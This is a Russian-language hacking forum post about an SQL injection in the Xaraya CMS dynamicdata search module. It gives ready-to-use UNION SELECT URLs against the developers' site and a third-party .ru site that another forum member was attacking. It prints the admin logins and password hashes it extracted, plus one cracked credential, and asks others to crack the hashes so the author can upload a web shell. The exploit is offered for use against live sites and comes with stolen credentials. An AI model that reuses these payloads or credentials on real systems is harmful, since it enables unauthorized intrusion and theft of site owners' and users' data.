Сорри что так долго. Короче после ночи просматривания грёбаных исходников и видя как все параметры перед выводом проводятся через функцию проверки... я всё таки нашёл место где параметр пихают не глядя

В модуле dynamicdata (к нему можно обращаться даже если ты не зареган) , при поиске выводится типа превтюхи $data['q'] = isset($q) ? xarVarPrepForDisplay($q) : null;

Собсно пример приведу на сайте разработчиков

http://www.xaraya.com/index.php?module=dynamicdata&func=search&itemtype= 2&q=test'+union+select+1,xar_uname,xar_pass,4+from +xar_roles+where+xar_uid=3+--+&dd_check%5B22%5D=1&dd_check%5B23%5D=1&dd_chec k%5B24%5D=1&dd_check%5B25%5D=1

И видим логин и мд5 пароля

Admin:d5b0db1c94d2d2e23b850792be247c9d

zlo12 Сайт который ты ломал там 4-я ветка и префикс, поэтому зпрос немного другой

http://***.ru/index.php?module=dynamicdata&func=search&itemtype= 2&q=test%27+union+select+1%2Cxar_pass%2Cxar_uname% 2C4+from+cms_roles+where+xar_uid%3D3%2F%2A&dd_chec k%5B22%5D=1&dd_check%5B23%5D=1&dd_check%5B24%5D=1& dd_check%5B25%5D=1

test' union select 1,xar_pass,xar_uname,4 from cms_roles where xar_uid=4/*

И видим хеш

Admin:90116554c7244cc38acef19146ed7ee1

Мне удалось тока один хеш кольнуть и тот не админа.

web:3f230640b78d7e71ac5514e57935eb69:qazxsw

Воопщем доволен как слон , что добил а то уже хотел бросить ковырятся в этом говне)))

Если кольнёте хеши, то я бы судовольствием попробовал бы залить шел и поковыряться.

Собсно всё.